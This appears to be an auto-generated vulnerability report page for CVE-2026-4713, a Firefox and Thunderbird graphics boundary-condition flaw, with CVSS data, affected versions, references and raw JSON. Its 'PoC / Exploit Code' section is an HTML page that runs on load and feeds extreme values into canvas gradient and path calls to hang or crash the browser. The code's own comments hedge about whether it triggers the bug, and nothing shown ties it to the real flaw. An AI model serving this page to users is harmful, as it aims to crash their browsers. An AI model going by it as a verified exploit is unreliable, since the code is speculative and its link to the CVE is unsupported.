Security Vulnerability Report
CVE-2026-4713 CVSS 7.5 HIGH

Published: 2026-03-24 13:16:07
Last Modified: 2026-04-13 15:17:43

Description

Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 149
Mozilla Firefox ESR < 140.9
Mozilla Thunderbird < 149
Mozilla Thunderbird < 140.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC for CVE-2026-4713
  Description: This script attempts to trigger the boundary condition issue in the Graphics component.
  Note: Actual exploitation requires specific payload tuning based on the vulnerable component version.
-->
<html>
<head>
  <title>CVE-2026-4713 Graphics Crash PoC</title>
</head>
<body>
  <h1>CVE-2026-4713 Proof of Concept</h1>
  <canvas id="exploitCanvas" width="800" height="600"></canvas>
  <script>
    function triggerVuln() {
      var canvas = document.getElementById('exploitCanvas');
      var ctx = canvas.getContext('2d', { alpha: false }); // Context settings

      // Attempt to manipulate graphics data to hit incorrect boundary conditions
      // This involves creating a path or gradient with extreme or malformed values
      try {
        // Create a linear gradient with manipulated coordinates
        // Vulnerability might be triggered by values exceeding expected integer boundaries
        var gradient = ctx.createLinearGradient(0, 0, 4294967295, 4294967295);
        gradient.addColorStop(0, 'rgba(255,0,0,1)');
        gradient.addColorStop(1, 'rgba(0,0,255,1)');
        ctx.fillStyle = gradient;
        ctx.fillRect(0, 0, 800, 600);

        // Alternative trigger: Drawing a massive path
        ctx.beginPath();
        ctx.moveTo(0, 0);
        ctx.lineTo(1.7976931348623157e+308, 1.7976931348623157e+308); // Max double value
        ctx.stroke();

        console.log("Render complete. If browser hangs or crashes, PoC successful.");
      } catch (e) {
        console.error("Exception occurred during render attempt:", e);
      }
    }

    // Execute automatically on load
    window.onload = triggerVuln;
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4713", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:07.217", "lastModified": "2026-04-13T15:17:42.720", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the Graphics component. This vulnerability was fixed in Firefox 149, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9."}, {"lang": "es", "value": "Condiciones de contorno incorrectas en el componente Gráficos. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", 
"versionEndExcluding": "140.9.0", "matchCriteriaId": "DA62D95E-CB01-4586-83DB-5094116FC939"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2018113", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/", "source": "[email protected]"}]}}